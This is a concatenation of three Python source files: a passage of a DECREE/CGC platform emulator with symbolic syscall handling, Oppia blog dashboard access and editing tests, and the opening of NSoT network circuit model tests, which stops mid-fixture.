# return Decree.CGC_EINVAL
cpu.memory.munmap(addr, size)
self.syscall_trace.append(("_deallocate", -1, size))
return 0
def sys_fdwait(self, cpu, nfds, readfds, writefds, timeout, readyfds):
''' fdwait - wait for file descriptors to become ready
'''
logger.debug("FDWAIT(%d, 0x%08x, 0x%08x, 0x%08x, 0x%08x)" % (nfds, readfds, writefds, timeout, readyfds))
if timeout:
if timeout not in cpu.memory: # todo: size
logger.info("FDWAIT: timeput is pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
if readyfds:
if readyfds not in cpu.memory:
logger.info("FDWAIT: readyfds pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
writefds_wait = set()
writefds_ready = set()
fds_bitsize = (nfds + 7) & ~7
if writefds:
if writefds not in cpu.memory:
logger.info("FDWAIT: writefds pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
bits = cpu.read_int(writefds, fds_bitsize)
for fd in range(nfds):
if (bits & 1 << fd):
if self.files[fd].is_full():
writefds_wait.add(fd)
else:
writefds_ready.add(fd)
readfds_wait = set()
readfds_ready = set()
if readfds:
if readfds not in cpu.memory:
logger.info("FDWAIT: readfds pointing to invalid memory. Returning EFAULT")
return Decree.CGC_EFAULT
bits = cpu.read_int(readfds, fds_bitsize)
for fd in range(nfds):
if (bits & 1 << fd):
if self.files[fd].is_empty():
readfds_wait.add(fd)
else:
readfds_ready.add(fd)
n = len(readfds_ready) + len(writefds_ready)
if n == 0:
# TODO FIX timout symbolic
if timeout != 0:
seconds = cpu.read_int(timeout, 32)
microseconds = cpu.read_int(timeout + 4, 32)
logger.info("FDWAIT: waiting for read on fds: {%s} and write to: {%s} timeout: %d", repr(
list(readfds_wait)), repr(list(writefds_wait)), microseconds + 1000 * seconds)
to = microseconds + 1000 * seconds
# no ready file, wait
else:
to = None
logger.info("FDWAIT: waiting for read on fds: {%s} and write to: {%s} timeout: INDIFENITELY",
repr(list(readfds_wait)), repr(list(writefds_wait)))
cpu.PC -= cpu.instruction.size
self.wait(readfds_wait, writefds_wait, to)
raise RestartSyscall() # When comming back from a timeout remember
# not to backtrack instruction and set EAX to 0! :( uglyness alert!
if readfds:
bits = 0
for fd in readfds_ready:
bits |= 1 << fd
for byte in range(0, nfds, 8):
cpu.write_int(readfds, (bits >> byte) & 0xff, 8)
if writefds:
bits = 0
for fd in writefds_ready:
bits |= 1 << fd
for byte in range(0, nfds, 8):
cpu.write_int(writefds, (bits >> byte) & 0xff, 8)
logger.info("FDWAIT: continuing. Some file is ready Readyfds: %08x", readyfds)
if readyfds:
cpu.write_int(readyfds, n, 32)
self.syscall_trace.append(("_fdwait", -1, None))
return 0
def int80(self, cpu):
'''
32 bit dispatcher.
:param cpu: current CPU.
_terminate, transmit, receive, fdwait, allocate, deallocate and random
'''
syscalls = {0x00000001: self.sys_terminate,
0x00000002: self.sys_transmit,
0x00000003: self.sys_receive,
0x00000004: self.sys_fdwait,
0x00000005: self.sys_allocate,
0x00000006: self.sys_deallocate,
0x00000007: self.sys_random,
}
if cpu.EAX not in syscalls.keys():
raise TerminateState("32 bit DECREE system call number {} Not Implemented".format(cpu.EAX))
func = syscalls[cpu.EAX]
logger.debug("SYSCALL32: %s (nargs: %d)", func.func_name, func.func_code.co_argcount)
nargs = func.func_code.co_argcount
args = [cpu, cpu.EBX, cpu.ECX, cpu.EDX, cpu.ESI, cpu.EDI, cpu.EBP]
cpu.EAX = func(*args[:nargs - 1])
def sched(self):
''' Yield CPU.
This will choose another process from the RUNNNIG list and change
current running process. May give the same cpu if only one running
proccess.
'''
if len(self.procs) > 1:
logger.info("SCHED:")
logger.info("\tProcess: %r", self.procs)
logger.info("\tRunning: %r", self.running)
logger.info("\tRWait: %r", self.rwait)
logger.info("\tTWait: %r", self.twait)
logger.info("\tTimers: %r", self.timers)
logger.info("\tCurrent clock: %d", self.clocks)
logger.info("\tCurrent cpu: %d", self._current)
if len(self.running) == 0:
logger.info("None running checking if there is some process waiting for a timeout")
if all([x is None for x in self.timers]):
raise Deadlock()
self.clocks = min(filter(lambda x: x is not None, self.timers)) + 1
self.check_timers()
assert len(self.running) != 0, "DEADLOCK!"
self._current = self.running[0]
return
next_index = (self.running.index(self._current) + 1) % len(self.running)
next = self.running[next_index]
if len(self.procs) > 1:
logger.info("\tTransfer control from process %d to %d", self._current, next)
self._current = next
def wait(self, readfds, writefds, timeout):
''' Wait for filedescriptors or timout.
Adds the current proceess in the correspondant wainting list and
yield the cpu to another running process.
'''
logger.info("WAIT:")
logger.info("\tProcess %d is going to wait for [ %r %r %r ]", self._current, readfds, writefds, timeout)
logger.info("\tProcess: %r", self.procs)
logger.info("\tRunning: %r", self.running)
logger.info("\tRWait: %r", self.rwait)
logger.info("\tTWait: %r", self.twait)
logger.info("\tTimers: %r", self.timers)
for fd in readfds:
self.rwait[fd].add(self._current)
for fd in writefds:
self.twait[fd].add(self._current)
if timeout is not None:
self.timers[self._current] = self.clocks + timeout
else:
self.timers[self._current] = None
procid = self._current
# self.sched()
next_index = (self.running.index(procid) + 1) % len(self.running)
self._current = self.running[next_index]
logger.info("\tTransfer control from process %d to %d", procid, self._current)
logger.info("\tREMOVING %r from %r. Current: %r", procid, self.running, self._current)
self.running.remove(procid)
if self._current not in self.running:
logger.info("\tCurrent not running. Checking for timers...")
self._current = None
if all([x is None for x in self.timers]):
raise Deadlock()
self.check_timers()
def awake(self, procid):
''' Remove procid from waitlists and restablish it in the running list '''
logger.info("Remove procid:%d from waitlists and restablish it in the running list", procid)
for wait_list in self.rwait:
if procid in wait_list:
wait_list.remove(procid)
for wait_list in self.twait:
if procid in wait_list:
wait_list.remove(procid)
self.timers[procid] = None
self.running.append(procid)
if self._current is None:
self._current = procid
def connections(self, fd):
if fd in [0, 1, 2]:
return None
if fd % 2:
return fd + 1
else:
return fd - 1
def signal_receive(self, fd):
''' Awake one process waiting to receive data on fd '''
connections = self.connections
if connections(fd) and self.twait[connections(fd)]:
procid = random.sample(self.twait[connections(fd)], 1)[0]
self.awake(procid)
def signal_transmit(self, fd):
''' Awake one process waiting to transmit data on fd '''
connections = self.connections
if connections(fd) and self.rwait[connections(fd)]:
procid = random.sample(self.rwait[connections(fd)], 1)[0]
self.awake(procid)
def check_timers(self):
''' Awake proccess if timer has expired '''
if self._current is None:
# Advance the clocks. Go to future!!
advance = min(filter(lambda x: x is not None, self.timers)) + 1
logger.info("Advancing the clock from %d to %d", self.clocks, advance)
self.clocks = advance
for procid in range(len(self.timers)):
if self.timers[procid] is not None:
if self.clocks > self.timers[procid]:
self.procs[procid].PC += self.procs[procid].instruction.size
self.awake(procid)
def execute(self):
"""
Execute one cpu instruction in the current thread (only one suported).
:rtype: bool
:return: C{True}
:todo: This is where we could implement a simple schedule.
"""
try:
self.current.execute()
self.clocks += 1
if self.clocks % 10000 == 0:
self.check_timers()
self.sched()
except Interruption as e:
if e.N != 0x80:
raise
try:
self.int80(self.current)
except RestartSyscall:
pass
return True
############################################################################
# Symbolic versions follows
class SDecree(Decree):
'''
A symbolic extension of a Decree Operating System .
'''
def __init__(self, constraints, programs, symbolic_random=None):
'''
Builds a symbolic extension of a Decree OS
:param constraints: a constraint set
:param cpus: CPU for this platform
:param mem: memory for this platform
'''
self.random = 0
self._constraints = constraints
super(SDecree, self).__init__(programs)
def _mk_proc(self):
return I386Cpu(SMemory32(self.constraints))
@property
def constraints(self):
return self._constraints
@constraints.setter
def constraints(self, constraints):
self._constraints = constraints
for proc in self.procs:
proc.memory.constraints = constraints
# marshaling/pickle
def __getstate__(self):
state = super(SDecree, self).__getstate__()
state['constraints'] = self.constraints
state['random'] = self.random
return state
def __setstate__(self, state):
self._constraints = state['constraints']
self.random = state['random']
super(SDecree, self).__setstate__(state)
def sys_receive(self, cpu, fd, buf, count, rx_bytes):
''' Symbolic version of Decree.sys_receive
'''
if issymbolic(fd):
logger.info("Ask to read from a symbolic file descriptor!!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(buf):
logger.info("Ask to read to a symbolic buffer")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(count):
logger.info("Ask to read a symbolic number of bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
if issymbolic(rx_bytes):
logger.info("Ask to return size to a symbolic address ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 3)
return super(SDecree, self).sys_receive(cpu, fd, buf, count, rx_bytes)
def sys_transmit(self, cpu, fd, buf, count, tx_bytes):
''' Symbolic version of Decree.sys_receive
'''
if issymbolic(fd):
logger.info("Ask to write to a symbolic file descriptor!!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(buf):
logger.info("Ask to write to a symbolic buffer")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(count):
logger.info("Ask to write a symbolic number of bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
if issymbolic(tx_bytes):
logger.info("Ask to return size to a symbolic address ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 3)
return super(SDecree, self).sys_transmit(cpu, fd, buf, count, tx_bytes)
def sys_allocate(self, cpu, length, isX, address_p):
if issymbolic(length):
logger.info("Ask to ALLOCATE a symbolic number of bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(isX):
logger.info("Ask to ALLOCATE potentially executable or not executable memory")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(address_p):
logger.info("Ask to return ALLOCATE result to a symbolic reference ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
return super(SDecree, self).sys_allocate(cpu, length, isX, address_p)
def sys_deallocate(self, cpu, addr, size):
if issymbolic(addr):
logger.info("Ask to DEALLOCATE a symbolic pointer?!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(size):
logger.info("Ask to DEALLOCATE a symbolic size?!")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
return super(SDecree, self).sys_deallocate(cpu, addr, size)
def sys_random(self, cpu, buf, count, rnd_bytes):
if issymbolic(buf):
logger.info("Ask to write random bytes to a symbolic buffer")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 0)
if issymbolic(count):
logger.info("Ask to read a symbolic number of random bytes ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 1)
if issymbolic(rnd_bytes):
logger.info("Ask to return rnd size to a symbolic address ")
cpu.PC = cpu.PC - cpu.instruction.size
raise SymbolicSyscallArgument(cpu, 2)
data = []
for i in xrange(count):
if False:
# Too slow for the new age.
value = self.constraints.new_bitvec(8, name="RANDOM_%04d" % self.random)
self.constraints.add(symb == cgcrandom.stream[self.random])
else:
value = cgcrandom.stream[self.random]
data.append(value)
self.random += 1
cpu.write_bytes(buf, data)
if rnd_bytes:
cpu.write_int(rnd_bytes, len(data), 32)
logger.info("RANDOM(0x%08x, %d, 0x%08x) -> %d", buf, count, rnd_bytes, len(data))
return 0
class DecreeEmu(object):
RANDOM = 0
@staticmethod
def cgc_initialize_secret_page(platform):
logger.info("Skipping: cgc_initialize_secret_page()")
return 0
@staticmethod
def cgc_random(platform, buf, count, rnd_bytes):
import cgcrandom
if issymbolic(buf):
logger.info("Ask to write random bytes to a symbolic buffer")
raise ConcretizeArgument(platform.current, 0)
if issymbolic(count):
logger.info("Ask to read a symbolic number of random bytes ")
raise ConcretizeArgument(platform.current, 1)
if issymbolic(rnd_bytes):
logger.info("Ask to return rnd size to a symbolic address ")
raise ConcretizeArgument(platform.current, 2)
data = []
for i in xrange(count):
value = cgcrandom.stream[DecreeEmu.RANDOM]
data.append(value)
DecreeEmu.random += 1
cpu = platform.current
cpu.write(buf, data)
if rnd_bytes:
cpu.store(rnd_bytes, len(data), 32)
logger.info("RANDOM(0x%08x, %d, 0x%08x) -> %d", buf, count, rnd_bytes, len(data))
return 0
|
py | 1a4a19b65efe02d55101cdf4d733297e7cd7266f | # Copyright 2021 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the blog dashboard page."""
from __future__ import absolute_import
from __future__ import unicode_literals
import os
from core.domain import blog_services
from core.tests import test_utils
import feconf
import python_utils
import utils
class BlogDashboardPageTests(test_utils.GenericTestBase):
"""Checks the access to the blog dashboard page and its rendering."""
def test_blog_dashboard_page_access_without_logging_in(self):
"""Tests access to the Blog Dashboard page."""
self.get_html_response('/blog-dashboard', expected_status_int=302)
def test_blog_dashboard_page_access_without_having_rights(self):
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.login(self.VIEWER_EMAIL)
self.get_html_response('/blog-dashboard', expected_status_int=401)
self.logout()
def test_blog_dashboard_page_access_as_blog_admin(self):
self.signup(self.BLOG_ADMIN_EMAIL, self.BLOG_ADMIN_USERNAME)
self.add_user_role(
self.BLOG_ADMIN_USERNAME, feconf.ROLE_ID_BLOG_ADMIN)
self.login(self.BLOG_ADMIN_EMAIL)
self.get_html_response('/blog-dashboard', expected_status_int=200)
self.logout()
def test_blog_dashboard_page_access_as_blog_post_editor(self):
self.signup(self.BLOG_EDITOR_EMAIL, self.BLOG_EDITOR_USERNAME)
self.add_user_role(
self.BLOG_EDITOR_USERNAME, feconf.ROLE_ID_BLOG_POST_EDITOR)
self.login(self.BLOG_EDITOR_EMAIL)
self.get_html_response('/blog-dashboard', expected_status_int=200)
self.logout()
class BlogDashboardDataHandlerTests(test_utils.GenericTestBase):
username = 'user'
user_email = '[email protected]'
def setUp(self):
"""Completes the sign-up process for the various users."""
super(BlogDashboardDataHandlerTests, self).setUp()
self.signup(
self.BLOG_ADMIN_EMAIL, self.BLOG_ADMIN_USERNAME)
self.signup(
self.BLOG_EDITOR_EMAIL, self.BLOG_EDITOR_USERNAME)
self.signup(self.user_email, self.username)
self.add_user_role(
self.BLOG_ADMIN_USERNAME, feconf.ROLE_ID_BLOG_ADMIN)
self.add_user_role(
self.BLOG_EDITOR_USERNAME,
feconf.ROLE_ID_BLOG_POST_EDITOR)
self.blog_admin_id = (
self.get_user_id_from_email(self.BLOG_ADMIN_EMAIL))
self.blog_editor_id = (
self.get_user_id_from_email(self.BLOG_EDITOR_EMAIL))
def test_get_dashboard_page_data(self):
# Checks blog editor can access blog dashboard.
self.login(self.BLOG_EDITOR_EMAIL)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL),
)
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
self.assertEqual(json_response['published_blog_post_summary_dicts'], [])
self.assertEqual(json_response['draft_blog_post_summary_dicts'], [])
self.logout()
# Checks blog admin can access blog dashboard.
self.login(self.BLOG_ADMIN_EMAIL)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL),
)
self.assertEqual(self.BLOG_ADMIN_USERNAME, json_response['username'])
self.assertEqual(json_response['published_blog_post_summary_dicts'], [])
self.assertEqual(json_response['draft_blog_post_summary_dicts'], [])
self.logout()
# Checks non blog-admins and non-editors can not access blog dashboard.
self.login(self.user_email)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL), expected_status_int=401)
self.logout()
# Checks for correct published and draft blog post summary data.
blog_post = blog_services.create_new_blog_post(self.blog_editor_id)
change_dict = {
'title': 'Sample Title',
'thumbnail_filename': 'thumbnail.svg',
'content': '<p>Hello Bloggers<p>',
'tags': ['Newsletter', 'Learners']
}
self.login(self.BLOG_EDITOR_EMAIL)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL))
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
self.assertEqual(
blog_post.id,
json_response['draft_blog_post_summary_dicts'][0]['id'])
blog_services.update_blog_post(blog_post.id, change_dict)
blog_services.publish_blog_post(blog_post.id)
json_response = self.get_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL))
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
self.assertEqual(
blog_post.id,
json_response['published_blog_post_summary_dicts'][0]['id'])
self.assertEqual(
change_dict['title'],
json_response['published_blog_post_summary_dicts'][0]['title'])
self.assertEqual(json_response['draft_blog_post_summary_dicts'], [])
def test_create_new_blog_post(self):
# Checks blog editor can create a new blog post.
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
json_response = self.post_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL), {}, csrf_token=csrf_token)
blog_post_id = json_response['blog_post_id']
blog_post_rights = blog_services.get_blog_post_rights(blog_post_id)
self.assertEqual(blog_post_rights.editor_ids, [self.blog_editor_id])
self.logout()
# Checks non blog-admins and non editors cannot create a new blog post.
self.login(self.user_email)
json_response = self.post_json(
'%s' % (feconf.BLOG_DASHBOARD_DATA_URL), {},
csrf_token=csrf_token, expected_status_int=401)
self.logout()
class BlogPostHandlerTests(test_utils.GenericTestBase):
username = 'user'
user_email = '[email protected]'
def setUp(self):
"""Completes the sign-up process for the various users."""
super(BlogPostHandlerTests, self).setUp()
self.signup(
self.BLOG_ADMIN_EMAIL, self.BLOG_ADMIN_USERNAME)
self.signup(
self.BLOG_EDITOR_EMAIL, self.BLOG_EDITOR_USERNAME)
self.signup(self.user_email, self.username)
self.add_user_role(
self.BLOG_ADMIN_USERNAME, feconf.ROLE_ID_BLOG_ADMIN)
self.add_user_role(
self.BLOG_EDITOR_USERNAME,
feconf.ROLE_ID_BLOG_POST_EDITOR)
self.blog_admin_id = (
self.get_user_id_from_email(self.BLOG_ADMIN_EMAIL))
self.blog_editor_id = (
self.get_user_id_from_email(self.BLOG_EDITOR_EMAIL))
self.blog_post = (
blog_services.create_new_blog_post(self.blog_editor_id))
def test_get_blog_post_editor_page_data(self):
# Checks blog editor can access blog post editor.
self.login(self.BLOG_EDITOR_EMAIL)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
)
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
expected_blog_post_dict = {
'id': u'%s' % self.blog_post.id,
'title': '',
'content': '',
'tags': [],
'thumbnail_filename': None,
'url_fragment': '',
'published_on': None,
'last_updated': u'%s' % utils.convert_naive_datetime_to_string(
self.blog_post.last_updated)
}
self.assertEqual(
expected_blog_post_dict, json_response['blog_post_dict'])
self.assertEqual(10, json_response['max_no_of_tags'])
self.logout()
# Checks blog admin can access blog post editor for a given blog post.
self.login(self.BLOG_ADMIN_EMAIL)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
)
self.assertEqual(self.BLOG_EDITOR_USERNAME, json_response['username'])
expected_blog_post_dict = {
'id': u'%s' % self.blog_post.id,
'title': '',
'content': '',
'tags': [],
'thumbnail_filename': None,
'url_fragment': '',
'published_on': None,
'last_updated': u'%s' % utils.convert_naive_datetime_to_string(
self.blog_post.last_updated)
}
self.assertEqual(
expected_blog_post_dict, json_response['blog_post_dict'])
self.assertEqual(10, json_response['max_no_of_tags'])
self.logout()
# Checks non blog-admins and non-editors can not access blog editor.
self.login(self.user_email)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.logout()
self.set_curriculum_admins([self.username])
self.login(self.user_email)
json_response = self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.logout()
def test_get_blog_post_data_by_invalid_blog_post_id(self):
self.login(self.BLOG_EDITOR_EMAIL)
self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, '123'),
expected_status_int=500)
blog_services.delete_blog_post(self.blog_post.id)
self.get_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=404)
self.logout()
def test_put_blog_post_data(self):
# Checks blog editor can edit owned blog post.
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 'Sample Title',
'content': '<p>Hello<p>',
'tags': ['New lessons', 'Learners'],
'thumbnail_filename': 'file.svg'
},
'new_publish_status': False
}
json_response = self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token)
self.assertEqual(
json_response['blog_post']['title'], 'Sample Title')
blog_post = (
blog_services.get_blog_post_by_id(self.blog_post.id))
self.assertEqual(
blog_post.thumbnail_filename, 'file.svg')
self.logout()
def test_put_blog_post_data_by_invalid_blog_post_id(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 'Sample Title',
},
'new_publish_status': False
}
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, 123),
payload, csrf_token=csrf_token,
expected_status_int=404)
blog_services.delete_blog_post(self.blog_post.id)
csrf_token = self.get_new_csrf_token()
# This is raised by acl decorator.
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token, expected_status_int=404)
def test_update_blog_post_with_invalid_change_dict(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 1234,
},
'new_publish_status': False
}
response = self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(
response['error'], 'Schema validation for \'change_dict\''
' failed: Title should be a string.')
def test_publishing_unpublishing_blog_post(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {
'title': 'Sample Title',
'content': '<p>Hello<p>',
'tags': ['New lessons', 'Learners'],
'thumbnail_filename': 'file.svg'
},
'new_publish_status': True
}
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token)
blog_post_rights = blog_services.get_blog_post_rights(self.blog_post.id)
self.assertTrue(blog_post_rights.blog_post_is_published)
# Unpublishing blog post.
csrf_token = self.get_new_csrf_token()
payload = {
'change_dict': {},
'new_publish_status': False
}
self.put_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload, csrf_token=csrf_token)
blog_post_rights = blog_services.get_blog_post_rights(self.blog_post.id)
self.assertFalse(blog_post_rights.blog_post_is_published)
def test_uploading_thumbnail_with_valid_image(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'thumbnail_filename': 'test_svg.svg'
}
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'), 'rb',
encoding=None) as f:
raw_image = f.read()
self.post_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload,
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),),
expected_status_int=200)
self.logout()
def test_updating_blog_post_fails_with_invalid_image(self):
self.login(self.BLOG_EDITOR_EMAIL)
csrf_token = self.get_new_csrf_token()
payload = {
'thumbnail_filename': 'cafe.flac'
}
with python_utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'cafe.flac'), 'rb',
encoding=None) as f:
raw_image = f.read()
json_response = self.post_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
payload,
csrf_token=csrf_token,
upload_files=(('image', 'unused_filename', raw_image),),
expected_status_int=400)
self.assertEqual(
json_response['error'], 'Image exceeds file size limit of 100 KB.')
def test_guest_can_not_delete_blog_post(self):
response = self.delete_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.assertEqual(
response['error'],
'You must be logged in to access this resource.')
def test_cannot_delete_invalid_blog_post(self):
# Check that an invalid blog post can not be deleted.
# Error is raised by acl decorator.
self.login(self.BLOG_ADMIN_EMAIL)
self.delete_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, 123456),
expected_status_int=404)
self.logout()
self.login(self.BLOG_ADMIN_EMAIL)
# The error is raised by acl decorator as the blog post doesn't exist.
self.delete_json(
'%s/%s' % (feconf.BLOG_EDITOR_DATA_URL_PREFIX, 'abc123efgH34'),
expected_status_int=404)
self.logout()
def test_blog_post_handler_delete_by_admin(self):
# Check that blog admins can delete a blog post.
self.login(self.BLOG_ADMIN_EMAIL)
self.delete_json(
'%s/%s' % (
feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=200)
self.logout()
def test_blog_post_handler_delete_by_blog_editor(self):
# Check that editor who owns the blog post can delete it.
self.login(self.BLOG_EDITOR_EMAIL)
self.delete_json(
'%s/%s' % (
feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=200)
self.logout()
def test_cannot_delete_post_by_blog_editor(self):
# Check that blog editor who does not own the blog post can not
# delete it.
self.add_user_role(
self.username, feconf.ROLE_ID_BLOG_POST_EDITOR)
self.login(self.user_email)
self.delete_json(
'%s/%s' % (
feconf.BLOG_EDITOR_DATA_URL_PREFIX, self.blog_post.id),
expected_status_int=401)
self.logout()
|
py | 1a4a19ef74f984d92bf3d803a5bb0e297bf45207 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
from __future__ import absolute_import
import pytest
# Allow everything in there to access the DB
pytestmark = pytest.mark.django_db
from django.db import IntegrityError
from django.db.models import ProtectedError
from django.conf import settings
from django.core.exceptions import ValidationError as DjangoValidationError
import ipaddress
import logging
from nsot import exc, models
from .fixtures import admin_user, circuit, device, site, user, transactional_db
def test_creation(device):
"""Test basic Circuit creation."""
site = device.site
# Create a network for interface assignments
network = models.Network.objects.create(
cidr='10.32.0.0/24', site=site,
)
# A-side device/interface and child interface
device_a = device
iface_a = models.Interface.objects.create(
device=device_a, name='ae0', addresses=['10.32.0.1/32']
)
child_iface_a = models.Interface.objects.create(
device=device_a, name='ae0.0', addresses=['10.32.0.3/32'], parent=iface_a
)
# Z-side device/interface and child interface
device_z = models.Device.objects.create(
hostname='foo-bar2', site=site
)
iface_z = models.Interface.objects.create(
device=device_z, name='ae0', addresses=['10.32.0.2/32']
)
child_iface_z = models.Interface.objects.create(
device=device_z, name='ae0.0', addresses=['10.32.0.4/32'], parent=iface_z
)
# Create the circuits
circuit = models.Circuit.objects.create(
endpoint_a=iface_a, endpoint_z=iface_z
)
circuit_for_child_ifaces = models.Circuit.objects.create(
endpoint_a=child_iface_a, endpoint_z=child_iface_z
)
# Interface inherits endpoint_a's site
assert circuit.site == iface_a.site
# Name should be slugs of A/Z interfaces joined by '_'
expected_name_t = '{endpoint_a}_{endpoint_z}'
expected_name = expected_name_t.format(
endpoint_a=iface_a, endpoint_z=iface_z
)
assert circuit.name == expected_name
# Name slug should be the slugified version of the name
assert circuit.name_slug == expected_name.replace('/', '_')
# Assert property values
assert circuit.interfaces == [iface_a, iface_z]
assert [str(a) for a in circuit.addresses] == ['10.32.0.1/32', '10.32.0.3/32', \
'10.32.0.2/32', '10.32.0.4/32']
assert circuit.devices == [device_a, device_z]
# Try to create another circuit w/ the same interfaces (expecting Django
# validation error)
with pytest.raises(DjangoValidationError):
c2 = models.Circuit.objects.create(
endpoint_a=iface_a, endpoint_z=iface_z
)
# ... Or with A/Z sides swapped (expecting DRF validation error).
with pytest.raises(exc.ValidationError):
c2 = models.Circuit.objects.create(
endpoint_a=iface_z, endpoint_z=iface_a
)
def test_attributes(circuit):
"""Test that attributes work as expected."""
models.Attribute.objects.create(
site=circuit.site, resource_name='Circuit', name='cid'
)
models.Attribute.objects.create(
site=circuit.site, resource_name='Circuit', name='vendor'
)
# Set attributes
attrs = {'cid': 'abc123', 'vendor': 'acme'}
circuit.set_attributes(attrs)
assert circuit.get_attributes() == attrs
# Test a sinmple set query just for kicks.
query_result = models.Circuit.objects.set_query('cid=abc123 vendor=acme')
assert list(query_result) == [circuit]
# Verify that we can zero out attributes
circuit.set_attributes({})
assert circuit.get_attributes() == {}
# And make sure no bogus attributes can be set.
with pytest.raises(exc.ValidationError):
circuit.set_attributes(None)
with pytest.raises(exc.ValidationError):
circuit.set_attributes({0: 'value'})
with pytest.raises(exc.ValidationError):
circuit.set_attributes({'key': 0})
with pytest.raises(exc.ValidationError):
circuit.set_attributes({'made_up': 'value'})
class TestInterfaceFor(object):
@pytest.fixture
def device_z(self, site):
return models.Device.objects.create(site=site, hostname='foo-bar2')
@pytest.fixture
def interface_a(self, device):
return models.Interface.objects.create(device=device, name='eth0')
@pytest.fixture
def interface_z(self, device_z):
return models.Interface.objects.create(
device=device_z, name='eth0')
@pytest.fixture
def normal_circuit(self, device_z, interface_a, interface_z):
